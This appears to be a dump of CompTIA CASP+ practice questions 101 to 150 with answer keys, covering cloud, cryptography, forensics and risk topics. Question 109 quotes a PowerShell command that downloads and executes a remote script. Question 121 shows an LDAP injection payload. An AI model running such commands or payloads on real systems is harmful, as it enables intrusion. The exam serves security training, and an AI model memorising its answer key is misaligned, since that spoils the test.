CompTIA Advanced Security Practitioner Topic 3
Question #: 101
Topic #: 1
Which of the following is the MOST important cloud-specific risk from the CSP’s viewpoint?
A. Isolation control failure
B. Management plane breach
C. Insecure data deletion
D. Resource exhaustion
Hint Answer: B
Question #: 102
Topic #: 1
An organization is developing a disaster recovery plan that requires data to be backed up and available at a moment’s notice.
Which of the following should the organization consider FIRST to address this requirement?
A. Implement a change management plan to ensure systems are using the appropriate versions.
B. Hire additional on-call staff to be deployed if an event occurs.
C. Design an appropriate warm site for business continuity.
D. Identify critical business processes and determine associated software and hardware requirements.
Hint Answer: D
Question #: 103
Topic #: 1
Leveraging cryptographic solutions to protect data that is in use ensures the data is encrypted:
A. when it is passed across a local network.
B. in memory during processing.
C. when it is written to a system’s solid-state drive.
D. by an enterprise hardware security module.
Hint Answer: B
Question #: 104
Topic #: 1
A Chief Information Officer (CIO) wants to implement a cloud solution that will satisfy the following requirements:
✑ Support all phases of the SDLC.
✑ Use tailored website portal software.
✑ Allow the company to build and use its own gateway software.
✑ Utilize its own data management platform.
✑ Continue using agent-based security tools.
Which of the following cloud-computing models should the CIO implement?
A. SaaS
B. PaaS
C. MaaS
D. IaaS
Hint Answer: B
Question #: 105
Topic #: 1
A security analyst detected a malicious PowerShell attack on a single server. The malware used the Invoke-Expression function to execute an external malicious script. The security analyst scanned the disk with an antivirus application and did not find any IOCs. The security analyst now needs to deploy a protection solution against this type of malware.
Which of the following BEST describes the type of malware the solution should protect against?
A. Worm
B. Logic bomb
C. Fileless
D. Rootkit
Hint Answer: C
Question #: 106
Topic #: 1
A development team created a mobile application that contacts a company’s back-end APIs housed in a PaaS environment. The APIs have been experiencing high processor utilization due to scraping activities. The security engineer needs to recommend a solution that will prevent and remedy the behavior.
Which of the following would BEST safeguard the APIs? (Choose two.)
A. Bot protection
B. OAuth 2.0
C. Input validation
D. Autoscaling endpoints
E. Rate limiting
F. CSRF protection
Hint Answer: AE
Question #: 107
Topic #: 1
An organization’s existing infrastructure includes site-to-site VPNs between datacenters. In the past year, a sophisticated attacker exploited a zero-day vulnerability on the VPN concentrator. Consequently, the Chief Information Security Officer (CISO) is making infrastructure changes to mitigate the risk of service loss should another zero-day exploit be used against the VPN solution.
Which of the following designs would be BEST for the CISO to use?
A. Adding a second redundant layer of alternate vendor VPN concentrators
B. Using Base64 encoding within the existing site-to-site VPN connections
C. Distributing security resources across VPN sites
D. Implementing IDS services with each VPN concentrator
E. Transitioning to a container-based architecture for site-based services
Hint Answer: A
Question #: 108
Topic #: 1
A local government that is investigating a data exfiltration claim was asked to review the fingerprint of the malicious user’s actions. An investigator took a forensic image of the VM and downloaded the image to a secured USB drive to share with the government.
Which of the following should be taken into consideration during the process of releasing the drive to the government?
A. Encryption in transit
B. Legal issues
C. Chain of custody
D. Order of volatility
E. Key exchange
Hint Answer: C
Question #: 109
Topic #: 1
A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell `IEX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois`
Which of the following security controls would have alerted and prevented the next phase of the attack?
A. Antivirus and UEBA
B. Reverse proxy and sandbox
C. EDR and application approved list
D. Forward proxy and MFA
Hint Answer: C
Question #: 110
Topic #: 1
As part of its risk strategy, a company is considering buying insurance for cybersecurity incidents.
Which of the following BEST describes this kind of risk response?
A. Risk rejection
B. Risk mitigation
C. Risk transference
D. Risk avoidance
Hint Answer: C
Question #: 111
Topic #: 1
A DevOps team has deployed databases, event-driven services, and an API gateway as a PaaS solution that will support a new billing system.
Which of the following security responsibilities will the DevOps team need to perform?
A. Securely configure the authentication mechanisms.
B. Patch the infrastructure at the operating system.
C. Execute port scanning against the services.
D. Upgrade the service as part of life-cycle management.
Hint Answer: A
Question #: 112
Topic #: 1
A company’s Chief Information Officer wants to implement IDS software onto the current system’s architecture to provide an additional layer of security. The software must be able to monitor system activity, provide information on attempted attacks, and provide analysis of malicious activities to determine the processes or users involved.
Which of the following would provide this information?
A. HIPS
B. UEBA
C. HIDS
D. NIDS
Hint Answer: C
Question #: 113
Topic #: 1
The Chief Information Security Officer of a startup company has asked a security engineer to implement a software security program in an environment that previously had little oversight.
Which of the following testing methods would be BEST for the engineer to utilize in this situation?
A. Software composition analysis
B. Code obfuscation
C. Static analysis
D. Dynamic analysis
Hint Answer: D
Question #: 114
Topic #: 1
A forensic investigator would use the foremost command for:
A. cloning disks.
B. analyzing network-captured packets.
C. recovering lost files.
D. extracting features such as email addresses.
Hint Answer: C
Question #: 115
Topic #: 1
A software company is developing an application in which data must be encrypted with a cipher that requires the following:
✑ Initialization vector
✑ Low latency
✑ Suitable for streaming
Which of the following ciphers should the company use?
A. Cipher feedback
B. Cipher block chaining message authentication code
C. Cipher block chaining
D. Electronic codebook
Hint Answer: A
Question #: 116
Topic #: 1
An organization that provides a SaaS solution recently experienced an incident involving customer data loss. The system has a level of self-healing that includes monitoring performance and available resources. When the system detects an issue, the self-healing process is supposed to restart parts of the software.
During the incident, when the self-healing system attempted to restart the services, available disk space on the data drive to restart all the services was inadequate. The self-healing system did not detect that some services did not fully restart and declared the system as fully operational.
Which of the following BEST describes the reason why the silent failure occurred?
A. The system logs rotated prematurely.
B. The disk utilization alarms are higher than what the service restarts require.
C. The number of nodes in the self-healing cluster was healthy.
D. Conditional checks prior to the service restart succeeded.
Hint Answer: D
Question #: 117
Topic #: 1
A security consultant needs to set up wireless security for a small office that does not have Active Directory. Despite the lack of central account management, the office manager wants to ensure a high level of defense to prevent brute-force attacks against wireless authentication.
Which of the following technologies would BEST meet this need?
A. Faraday cage
B. WPA2 PSK
C. WPA3 SAE
D. WEP 128 bit
Hint Answer: C
Question #: 118
Topic #: 1
An attack team performed a penetration test on a new smart card system. The team demonstrated that by subjecting the smart card to high temperatures, the secret key could be revealed.
Which of the following side-channel attacks did the team use?
A. Differential power analysis
B. Differential fault analysis
C. Differential temperature analysis
D. Differential timing analysis
Hint Answer: B
Question #: 119
Topic #: 1
A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect to authorized endpoints. The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment.
Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant?
A. NAC to control authorized endpoints
B. FIM on the servers storing the data
C. A jump box in the screened subnet
D. A general VPN solution to the primary network
Hint Answer: C
Question #: 120
Topic #: 1
A networking team was asked to provide secure remote access to all company employees. The team decided to use client-to-site VPN as a solution. During a discussion, the Chief Information Security Officer raised a security concern and asked the networking team to route the Internet traffic of remote users through the main office infrastructure. Doing this would prevent remote users from accessing the Internet through their local networks while connected to the VPN.
Which of the following solutions does this describe?
A. Full tunneling
B. Asymmetric routing
C. SSH tunneling
D. Split tunneling
Hint Answer: A
Question #: 121
Topic #: 1
A security analyst discovered that the company’s WAF was not properly configured. The main web server was breached, and the following payload was found in one of the malicious requests:
(&(objectClass=*)(objectClass=*))(&(objectClass=void)(type=admin))
Which of the following would BEST mitigate this vulnerability?
A. Network intrusion prevention
B. Data encoding
C. Input validation
D. CAPTCHA
Hint Answer: C
Question #: 122
Topic #: 1
A security consultant needs to protect a network of electrical relays that are used for monitoring and controlling the energy used in a manufacturing facility.
Which of the following systems should the consultant review before making a recommendation?
A. CAN
B. ASIC
C. FPGA
D. SCADA
Hint Answer: D
Question #: 123
Topic #: 1
Company A acquired Company B. During an audit, a security engineer found Company B’s environment was inadequately patched. In response, Company A placed a firewall between the two environments until Company B’s infrastructure could be integrated into Company A’s security program.
Which of the following risk-handling techniques was used?
A. Accept
B. Avoid
C. Transfer
D. Mitigate
Hint Answer: D
Question #: 124
Topic #: 1
An organization is prioritizing efforts to remediate or mitigate risks identified during the latest assessment. For one of the risks, a full remediation was not possible, but the organization was able to successfully apply mitigations to reduce the likelihood of impact.
Which of the following should the organization perform NEXT?
A. Assess the residual risk.
B. Update the organization’s threat model.
C. Move to the next risk in the register.
D. Recalculate the magnitude of impact.
Hint Answer: A
Question #: 125
Topic #: 1
A software house is developing a new application. The application has the following requirements:
✑ Reduce the number of credential requests as much as possible
✑ Integrate with social networks
✑ Authenticate users
Which of the following is the BEST federation method to use for the application?
A. WS-Federation
B. OpenID
C. OAuth
D. SAML
Hint Answer: B
Question #: 126
Topic #: 1
A company is looking for a solution to hide data stored in databases. The solution must meet the following requirements:
✑ Be efficient at protecting the production environment
✑ Not require any change to the application
✑ Act at the presentation layer
Which of the following techniques should be used?
A. Masking
B. Tokenization
C. Algorithmic
D. Random substitution
Hint Answer: A
Question #: 127
Topic #: 1
A forensic expert working on a fraud investigation for a US-based company collected a few disk images as evidence.
Which of the following offers an authoritative decision about whether the evidence was obtained legally?
A. Lawyers
B. Court
C. Upper management team
D. Police
Hint Answer: B
Question #: 128
Topic #: 1
Technicians have determined that the current server hardware is outdated, so they have decided to throw it out.
Prior to disposal, which of the following is the BEST method to use to ensure no data remnants can be recovered?
A. Drive wiping
B. Degaussing
C. Purging
D. Physical destruction
Hint Answer: D
Question #: 129
Topic #: 1
A penetration tester obtained root access on a Windows server and, according to the rules of engagement, is permitted to perform post-exploitation for persistence.
Which of the following techniques would BEST support this?
A. Configuring systemd services to run automatically at startup
B. Creating a backdoor
C. Exploiting an arbitrary code execution exploit
D. Moving laterally to a more authoritative server/service
Hint Answer: B
Question #: 130
Topic #: 1
A security architect for a large, multinational manufacturer needs to design and implement a security solution to monitor traffic.
When designing the solution, which of the following threats should the security architect focus on to prevent attacks against the OT network?
A. Packets that are the wrong size or length
B. Use of any non-DNP3 communication on a DNP3 port
C. Multiple solicited responses over time
D. Application of an unsupported encryption algorithm
Hint Answer: B
Question #: 131
Topic #: 1
A security administrator configured the account policies per security implementation guidelines. However, the accounts still appear to be susceptible to brute-force attacks. The following settings meet the existing compliance guidelines:
✑ Must have a minimum of 15 characters
✑ Must use one number
✑ Must use one capital letter
✑ Must not be one of the last 12 passwords used
Which of the following policies should be added to provide additional security?
A. Shared accounts
B. Password complexity
C. Account lockout
D. Password history
E. Time-based logins
Hint Answer: C
Question #: 132
Topic #: 1
A cybersecurity analyst discovered a private key that could have been exposed.
Which of the following is the BEST way for the analyst to determine if the key has been compromised?
A. HSTS
B. CRL
C. CSRs
D. OCSP
Hint Answer: D
Question #: 133
Topic #: 1
Which of the following technologies allows CSPs to add encryption across multiple data storages?
A. Symmetric encryption
B. Homomorphic encryption
C. Data dispersion
D. Bit splitting
Hint Answer: D
Question #: 134
Topic #: 1
A vulnerability scanner detected an obsolete version of an open-source file-sharing application on one of a company’s Linux servers. While the software version is no longer supported by the OSS community, the company’s Linux vendor backported fixes, applied them for all current vulnerabilities, and agrees to support the software in the future.
Based on this agreement, this finding is BEST categorized as a:
A. true positive.
B. true negative.
C. false positive.
D. false negative.
Hint Answer: A
Question #: 135
Topic #: 1
A company’s Chief Information Security Officer is concerned that the company’s proposed move to the cloud could lead to a lack of visibility into network traffic flow logs within the VPC.
Which of the following compensating controls would be BEST to implement in this situation?
A. EDR
B. SIEM
C. HIDS
D. UEBA
Hint Answer: B
Question #: 136
Topic #: 1
A security team received a regulatory notice asking for information regarding collusion and pricing from staff members who are no longer with the organization.
The legal department provided the security team with a list of search terms to investigate.
This is an example of:
A. due diligence.
B. e-discovery.
C. due care.
D. legal hold.
Hint Answer: B
Question #: 137
Topic #: 1
Which of the following protocols is a low-power, low-data-rate protocol that allows for the creation of PAN networks?
A. Zigbee
B. CAN
C. DNP3
D. Modbus
Hint Answer: A
Question #: 138
Topic #: 1
An organization’s assessment of a third-party, non-critical vendor reveals that the vendor does not have cybersecurity insurance and IT staff turnover is high. The organization uses the vendor to move customer office equipment from one service location to another. The vendor acquires customer data and access to the business via an API.
Given this information, which of the following is a noted risk?
A. Feature delay due to extended software development cycles
B. Financial liability from a vendor data breach
C. Technical impact to the API configuration
D. The possibility of the vendor’s business ceasing operations
Hint Answer: B
Question #: 139
Topic #: 1
A company wants to quantify and communicate the effectiveness of its security controls but must establish measures. Which of the following is MOST likely to be included in an effective assessment roadmap for these controls?
A. Create a change management process.
B. Establish key performance indicators.
C. Create an integrated master schedule.
D. Develop a communication plan.
E. Perform a security control assessment.
Hint Answer: B
Question #: 140
Topic #: 1
A bank is working with a security architect to find the BEST solution to detect database management system compromises. The solution should meet the following requirements:
✑ Work at the application layer
✑ Send alerts on attacks from both privileged and malicious users
✑ Have a very low false positive rate
Which of the following should the architect recommend?
A. FIM
B. WAF
C. NIPS
D. DAM
E. UTM
Hint Answer: D
Question #: 141
Topic #: 1
A business wants to migrate its workloads from an exclusively on-premises IT infrastructure to the cloud but cannot implement all the required controls. Which of the following BEST describes the risk associated with this implementation?
A. Loss of governance
B. Vendor lockout
C. Compliance risk
D. Vendor lock-in
Hint Answer: A
Question #: 142
Topic #: 1
A security architect needs to implement a CASB solution for an organization with a highly distributed remote workforce. One of the requirements for the implementation includes the capability to discover SaaS applications and block access to those that are unapproved or identified as risky. Which of the following would BEST achieve this objective?
A. Deploy endpoint agents that monitor local web traffic to enforce DLP and encryption policies.
B. Implement cloud infrastructure to proxy all user web traffic to enforce DLP and encryption policies.
C. Implement cloud infrastructure to proxy all user web traffic and control access according to centralized policy.
D. Deploy endpoint agents that monitor local web traffic and control access according to centralized policy.
Hint Answer: C
Question #: 143
Topic #: 1
During a phishing exercise, a few privileged users ranked high on the failure list. The enterprise would like to ensure that privileged users have an extra security-monitoring control in place. Which of the following is the MOST likely solution?
A. A WAF to protect web traffic
B. User and entity behavior analytics
C. Requirements to change the local password
D. A gap analysis
Hint Answer: B
Question #: 144
Topic #: 1
An analyst is evaluating the security of a web application that does not hold sensitive or financial data. The application requires users to have a minimum password length of 12 characters. One of the characters must be capitalized, and one must be a number. To reset the password, the user is asked to provide the birthplace, birthdate, and mother’s maiden name. When all of these are entered correctly, a new password is emailed to the user. Which of the following should concern the analyst the MOST?
A. The security answers may be determined via online reconnaissance.
B. The password is too long, which may encourage users to write the password down.
C. The password should include a special character.
D. The minimum password length is too short.
Hint Answer: A
Question #: 145
Topic #: 1
In a cloud environment, the provider offers relief to an organization’s teams by sharing in many of the operational duties. In a shared responsibility model, which of the following responsibilities belongs to the provider in a PaaS implementation?
A. Application-specific data assets
B. Application user access management
C. Application-specific logic and code
D. Application/platform software
Hint Answer: D
Question #: 146
Topic #: 1
SIMULATION
You are about to enter the virtual environment.
Once you have completed the item in the virtual environment, you will NOT be allowed to return to this item.
Click Next to continue.
Question and Instructions
DO NOT perform the following actions within the virtual environment. Making any of these changes will cause the virtual environment to fail and prevent proper scoring.
1. Disabling ssh
2. Disabling systemd
3. Altering the network adapter 172.162.0.0
4. Changing the password in the lab admin account
Once you have completed the item in the virtual environment, you will NOT be allowed to return to this item.
TEST QUESTION
This system was recently patched following the exploitation of a vulnerability by an attacker to enable data exfiltration.
Despite the vulnerability being patched, it is likely that a malicious TCP service is still running and the adversary has achieved persistence by creating a systemd service.
Examples of commands to use:
kill, killall
lsof
man, --help (use for assistance)
netstat (useful flags: a, n, g, u)
ps (useful flag: a)
systemctl (to control systemd)
Please note: the list of commands shown above is not exhaustive. All native commands are available.
INSTRUCTIONS
Using the following credentials:
Username: labXXXadmin
Password: XXXyyYzz!
Investigate to identify indicators of compromise and then remediate them. You will need to make at least two changes:
1. End the compromised process that is using a malicious TCP service.
2. Remove the malicious persistence agent by disabling the service’s ability to start on boot.
Question #: 147
Topic #: 1
An analyst received a list of IOCs from a government agency. The attack has the following characteristics:
1. The attack starts with bulk phishing.
2. If a user clicks on the link, a dropper is downloaded to the computer.
3. Each of the malware samples has unique hashes tied to the user.
The analyst needs to identify whether existing endpoint controls are effective. Which of the following risk mitigation techniques should the analyst use?
A. Update the incident response plan.
B. Blocklist the executable.
C. Deploy a honeypot onto the laptops.
D. Detonate in a sandbox.
Hint Answer: D
Question #: 148
Topic #: 1
An organization’s finance system was recently attacked. A forensic analyst is reviewing the contents of the compromised files for credit card data. Which of the following commands should the analyst run to BEST determine whether financial data was lost?
A. grep -v '^4 [0-9] {12} (?:[0-9]{3}) ?$' file
B. grep '^4 [0-9]{12}(?:[0-9]{3})?$' file
C. grep '^6(?:011|5[0-9]{2}) [0-9] {12} ?' file
D. grep -v '^6(?:011|5[0-9]{2})[0-9]{12}?' file
Hint Answer: B
Question #: 149
Topic #: 1
An organization requires a contractual document that includes:
✑ An overview of what is covered
✑ Goals and objectives
✑ Performance metrics for each party
✑ A review of how the agreement is managed by all parties
Which of the following BEST describes this type of contractual document?
A. SLA
B. BAA
C. NDA
D. ISA
Hint Answer: A
Question #: 150
Topic #: 1
A company based in the United States holds insurance details of EU citizens. Which of the following must be adhered to when processing EU citizens’ personal, private, and confidential data?
A. The principle of lawful, fair, and transparent processing
B. The right to be forgotten principle of personal data erasure requests
C. The non-repudiation and deniability principle
D. The principle of encryption, obfuscation, and data masking
Hint Answer: A